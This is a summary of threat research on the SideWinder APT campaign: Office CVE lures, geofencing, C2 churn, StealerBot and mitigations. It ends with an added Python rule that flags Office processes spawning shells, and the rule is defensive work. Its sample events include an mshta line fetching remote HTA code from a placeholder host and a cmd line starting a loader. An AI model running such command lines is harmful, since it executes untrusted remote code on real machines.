Summary of Acronis Threat Research on SideWinder APT Campaign
The Acronis Threat Research Unit (TRU) has identified a new Advanced Persistent Threat (APT) campaign by the hacker group SideWinder, which primarily targets high-level government institutions in Sri Lanka, Bangladesh, and Pakistan. This campaign employs spear phishing tactics combined with geofenced payloads to ensure that the malicious content reaches only victims in specified countries.
Attack Vectors and Techniques
The attackers use malicious Word and Rich Text Format (RTF) files that exploit known vulnerabilities, specifically CVE-2017-0199 and CVE-2017-11882. These vulnerabilities enable remote code execution when a user opens tailored Office documents. SideWinder’s intrusion method leverages multistage loaders and employs server-side polymorphism to evade detection.
The group often utilizes carefully crafted lure documents, such as a fake publication titled “Sri Lanka Customs National Imports Tariff Guide 2025,” to entice targets into opening these files. This tactic highlights the group’s focus on high-value sectors, as they aim to maintain persistent access to crucial governmental infrastructures.
Despite the vulnerabilities being long-patched, they remain effective due to many organizations’ reliance on outdated software, which is particularly prevalent in agencies dealing with governmental and defense operations.
Evasion Strategies
SideWinder’s tactics include presenting custom content depending on the victim’s location and operating environment. If the criteria are not met, the server responds with an error or a decoy file to further obfuscate the attack. The ongoing refinement of their methods—such as transitioning from using mshta.exe to shellcode-based loaders—demonstrates the group’s adaptability while maintaining consistent operational patterns.
The campaign has notably targeted significant government bodies, including the Central Bank of Sri Lanka and the Sri Lanka Army’s 55th Division. Each victim receives highly customized emails and documents to increase the likelihood of infection, which reflects SideWinder’s operational maturity and attention to detail in spear phishing endeavors.
Command-and-Control Infrastructure
SideWinder frequently updates its command-and-control (C2) infrastructure, as evidenced by the registration of multiple new domains and the repointing of existing ones. Spikes in this registration and repointing activity have been observed, indicating periods of heightened operational tempo that are likely tied to ongoing campaigns.
Payload Delivery and Exfiltration
The final payload delivered through this attack chain is StealerBot, a credential-stealing malware that collects sensitive information. This stage involves advanced techniques such as DLL sideloading, using legitimate executables to load malicious components seamlessly. Additionally, the malware employs sophisticated obfuscation methods, complicating static analysis and detection efforts.
Recommendations for Mitigation
To counter threats like SideWinder, the Acronis TRU recommends disabling macros and external content loading in Microsoft Office, monitoring for suspicious processes spawned by Office applications, and ensuring endpoint detection and response solutions are in place to track anomalies. Additionally, educating users about spear phishing tactics can significantly enhance an organization’s cybersecurity posture.
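The "suspicious processes spawned by Office applications" advice above can be turned into a concrete parent/child process check. The following is an added example (not code from the Acronis report or from Acronis products) that runs a simple rule over constructed Sysmon-style process-creation records; the process names, paths and command lines are made up for illustration.

```python
# Added example: flag Office hosts (and Equation Editor) that spawn
# scripting or shell children, the pattern seen with CVE-2017-0199
# (mshta.exe launched from Word) and CVE-2017-11882 (code run inside
# EQNEDT32.EXE, which then launches a child process).
from typing import Iterable

# Office hosts that should rarely spawn script interpreters or shells.
OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe",
}
# Children typical of HTA/script delivery and of follow-on loaders.
SUSPICIOUS_CHILDREN = {
    "mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Constructed records (field names follow Sysmon Event ID 1; values are
# invented for this example, not taken from the report).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/lure.hta"},
    {"id": 2, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"id": 3, "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c start loader.exe"},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File backup.ps1"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(event: dict) -> bool:
    """True when an Office host (or Equation Editor) spawns a scripting/shell child."""
    return (basename(event["ParentImage"]) in OFFICE_PARENTS
            and basename(event["Image"]) in SUSPICIOUS_CHILDREN)


def flag_events(events: Iterable[dict]) -> list:
    """Return the ids of the events that match the parent/child rule."""
    return [e["id"] for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        if is_suspicious(e):
            print(f"ALERT event {e['id']}: {basename(e['ParentImage'])} -> {e['CommandLine']}")
```

Event 2 (Word spawning the print spooler helper) and event 4 (PowerShell started from Explorer) are left alone, so the rule focuses on the Office-to-interpreter edge rather than on interpreter use in general.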
Conclusion
The persistence of older vulnerabilities like CVE-2017-0199 and CVE-2017-11882 in SideWinder’s operations underlines the ongoing relevance of legacy exploits in modern cyberattacks. This continuous adaptation coupled with precision targeting enables the group to remain a formidable threat to governmental institutions in South Asia, thereby necessitating robust defensive measures and user education initiatives.